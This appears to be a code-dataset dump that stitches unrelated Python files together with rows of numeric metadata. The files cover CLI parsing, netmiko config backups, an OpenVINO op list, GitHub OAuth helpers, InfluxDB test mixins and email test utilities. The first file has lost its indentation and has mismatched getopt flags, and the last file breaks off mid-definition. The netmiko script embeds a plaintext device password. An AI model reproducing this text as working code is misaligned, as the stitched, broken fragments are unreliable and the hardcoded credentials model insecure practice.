DEFAULT_RANGE = [0, 1000]
def arguments():
options, *_ = getopt(argv[1:], 'dc', ['dataset-file=', 'columns=', 'visus=', 'range='])
dataset_file = DEFAULT_DATASET_FILE_PATH
dataset_columns = DEFAULT_DATASET_COLUMNS
dataset_visus = DEFAULT_VISU
dataset_range = DEFAULT_RANGE
for opt, arg in options:
if opt in ('-d', '--dataset-file'):
dataset_file = arg
elif opt in ('-c', '--columns'):
dataset_columns = arg.split(',')
elif opt in ('-v', '--visus'):
dataset_visus = arg.split(',')
elif opt in ('-r', '--range'):
dataset_range = arg.split(',')
dataset_range = list(map(lambda x: int(x), dataset_range))
if len(dataset_range) == 1 :
dataset_range.append(DEFAULT_RANGE[1])
if not access(dataset_file, R_OK):
raise RuntimeError(Template("the file $file does not exists or is not readable.").substitute(file=dataset_file))
for column in dataset_columns:
if column not in DEFAULT_DATASET_COLUMNS:
raise RuntimeError(Template("Invalid column $column must be one of $columns.").
substitute(column=column, columns=','.join(DEFAULT_DATASET_COLUMNS)))
for visu in dataset_visus:
if visu not in DEFAULT_VISU:
raise RuntimeError(Template("Invalid visu $column must be one of $columns.").
substitute(column=visu, columns=','.join(DEFAULT_VISU)))
for range_num in dataset_range:
if range_num not in range(0, 1001):
raise RuntimeError(Template("Invalid range $column must be between 0 and 999.").
substitute(column=range_num))
return dataset_file, dataset_columns, dataset_visus, dataset_range
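# A hedged usage sketch, not part of the original module: a hypothetical entry
# point would call arguments() after the script is invoked with the long
# options parsed above, for example
#   python main.py --dataset-file=dataset/data.csv --columns=latitude,longitude --visus=histogram --range=0,500
dataset_file, dataset_columns, dataset_visus, dataset_range = arguments()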
| 41.784314
| 120
| 0.633975
| 264
| 2,131
| 4.924242
| 0.310606
| 0.076154
| 0.064615
| 0.073846
| 0.132308
| 0.061538
| 0.061538
| 0.061538
| 0
| 0
| 0
| 0.011229
| 0.247771
| 2,131
| 50
| 121
| 42.62
| 0.79975
| 0
| 0
| 0
| 0
| 0
| 0.177851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.095238
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6bf9a13a6fe5e608e3131b9e7d5730fd32e4d4
| 1,490
|
py
|
Python
|
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | 3
|
2021-05-20T05:34:49.000Z
|
2022-02-14T03:35:10.000Z
|
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | null | null | null |
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | 2
|
2021-08-19T12:34:47.000Z
|
2022-03-28T15:48:55.000Z
|
# Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Convert the MGMT IP Address column of the data frame to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "C1sco12345", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| 31.702128
| 85
| 0.658389
| 212
| 1,490
| 4.533019
| 0.495283
| 0.031217
| 0.067638
| 0.05411
| 0.187305
| 0.187305
| 0.187305
| 0
| 0
| 0
| 0
| 0.014311
| 0.249664
| 1,490
| 46
| 86
| 32.391304
| 0.845259
| 0.357718
| 0
| 0
| 0
| 0
| 0.177282
| 0.057325
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.038462
| 0.076923
| 0
| 0.076923
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6cc530fb4e5b20aac699a77d75b91318a5ca68
| 2,385
|
py
|
Python
|
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
plaidml/openvino
|
e784ab8ab7821cc1503d9c5ca6034eea112bf52b
|
[
"Apache-2.0"
] | null | null | null |
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
plaidml/openvino
|
e784ab8ab7821cc1503d9c5ca6034eea112bf52b
|
[
"Apache-2.0"
] | 105
|
2020-06-04T00:23:29.000Z
|
2022-02-21T13:04:33.000Z
|
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
mpapaj/openvino
|
37b46de1643a2ba6c3b6a076f81d0a47115ede7e
|
[
"Apache-2.0"
] | 1
|
2020-10-23T06:45:11.000Z
|
2020-10-23T06:45:11.000Z
|
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1',
'FloorMod-1',
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1',
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1',
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
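# A brief aside, not part of the original file: the commas added above matter
# because adjacent string literals are concatenated implicitly in Python, so
# 'Floor-1' 'FloorMod-1' would have produced the single entry
# 'Floor-1FloorMod-1' and silently dropped ops from the verified list.
assert 'Floor-1' 'FloorMod-1' == 'Floor-1FloorMod-1'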
| 20.211864
| 58
| 0.568134
| 238
| 2,385
| 5.684874
| 0.52521
| 0.014782
| 0.019217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066814
| 0.240671
| 2,385
| 117
| 59
| 20.384615
| 0.680287
| 0.030189
| 0
| 0.017544
| 0
| 0
| 0.6
| 0.131602
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6ce225addf6075e565169dfeb40c47ef8bca4d
| 18,542
|
py
|
Python
|
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
"""Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
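# A hedged usage sketch, not part of the original module: rendering issue
# timeline entries with the event_dict table defined at the top of the file.
# `events` is a hypothetical list of event payloads from the GitHub issue
# events API.
def describe_events(events):
    for event in events:
        render = event_dict.get(event.get("event"))
        if render is not None:
            print(render(event))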
| 36.936255
| 99
| 0.584349
| 2,146
| 18,542
| 4.912861
| 0.122088
| 0.093901
| 0.064877
| 0.047804
| 0.63701
| 0.589111
| 0.524044
| 0.485535
| 0.465617
| 0.44143
| 0
| 0.008335
| 0.288211
| 18,542
| 501
| 100
| 37.00998
| 0.790499
| 0.010355
| 0
| 0.504405
| 0
| 0
| 0.178146
| 0.004912
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04185
| false
| 0.002203
| 0.015419
| 0
| 0.129956
| 0.085903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7228704cb0dda0e1c0b7305078fa094d1a0478
| 2,843
|
py
|
Python
|
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | 2
|
2019-10-17T05:36:51.000Z
|
2020-06-30T00:27:22.000Z
|
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | null | null | null |
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
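# A hedged usage sketch, not part of the original module: a concrete test case
# built on the mixin. "influxdb.conf.template" is a placeholder for the
# required influxdb_template_conf attribute.
import unittest

class ExampleServerTest(ManyTestCasesWithServerMixin, unittest.TestCase):
    influxdb_template_conf = "influxdb.conf.template"

    def test_write_and_query(self):
        self.cli.write_points([{"measurement": "cpu", "fields": {"value": 0.5}}])
        self.assertTrue(self.cli.query("SELECT * FROM cpu"))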
| 30.902174
| 74
| 0.655645
| 303
| 2,843
| 5.940594
| 0.343234
| 0.054444
| 0.04
| 0.033333
| 0.263889
| 0.166667
| 0.166667
| 0.098889
| 0.098889
| 0
| 0
| 0.000479
| 0.266268
| 2,843
| 91
| 75
| 31.241758
| 0.862416
| 0.322898
| 0
| 0.382979
| 0
| 0
| 0.029252
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170213
| false
| 0
| 0.191489
| 0
| 0.404255
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe739da7293d52a3a7c4940166ba21b32df8a642
| 9,107
|
py
|
Python
|
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | 5
|
2015-08-13T05:22:54.000Z
|
2018-08-28T14:14:55.000Z
|
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | null | null | null |
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <grabner@cadit.com>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
